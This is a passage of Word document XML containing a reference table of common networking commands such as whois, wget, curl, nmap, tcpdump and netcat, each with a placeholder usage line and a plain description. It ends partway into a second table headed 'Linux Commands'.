          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="4631D391" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B63D066" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F3ECB19" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47024317" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>whois</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;domain&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD4AE5C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays domain registration details and ownership info.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="26F81B3A" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="008E3AD8" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B7429C9" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6274027F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;URL&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1790BEE5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Downloads files or webpages from the web via HTTP/HTTPS/FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="44552BA3" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17395737" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD395FA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="092D45C1" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>curl &lt;URL&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28D9BDDA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Transfers data from or to a server using various protocols.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="345BD255" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1277E515" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9C1A71" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BAF234A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78E9973C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Scans networks to discover hosts, open ports, and services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="29744612" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41A0D255" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51B1DD58" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>tcpdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F856A56" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>tcpdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;interface&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C4D3844" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve">Captures and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>analyzes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> packets passing through a network interface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="726E5D21" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB0F14F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B265C8F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>iwconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69B9B356" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>iwconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> [interface]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1421DED5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Configures wireless network interfaces (SSID, mode, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="57E1D5D8" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF7AD55" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EC1508C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ethtool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="693BED50" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ethtool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;interface&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0C09D4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays and changes Ethernet device settings like speed and duplex.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="33F7DB3F" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD5926B" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="555EC945" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="305C30F6" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> -v &lt;IP&gt; &lt;port&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BCF1F7D" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Opens TCP/UDP connections for data transfer or port testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="08189C84" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A2DBC0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70D522BF" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>systemctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> restart network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BA2FCF6" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>systemctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> restart network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76CF41B4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Restarts the network service to apply configuration changes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A635D09" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00B55643"/>
    <w:p w14:paraId="3E5E430F" w14:textId="77777777" w:rsidR="00B55643" w:rsidRPr="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B55643"/>
    <w:p w14:paraId="3AE30B9F" w14:textId="3081874B" w:rsidR="00B55643" w:rsidRPr="00B55643" w:rsidRDefault="00074E6B" w:rsidP="00B55643">
      <w:r w:rsidRPr="00074E6B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Linux Commands</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF19152" w14:textId="77777777" w:rsidR="00B55643" w:rsidRDefault="00B55643" w:rsidP="00B5564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1572"/>
        <w:gridCol w:w="2561"/>
        <w:gridCol w:w="4439"/>
      </w:tblGrid>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="03DD8011" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A879338" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E278890" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAEBF27" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Synopsis (Usage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E7EF8B" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="0C116837" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6386B41C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B88F42" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="605C9ED5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ipconfig /all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C4632A2" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays IP configuration, subnet mask, gateway, and DNS details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="5EEECFBF" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D7C705" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AFAD7C4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
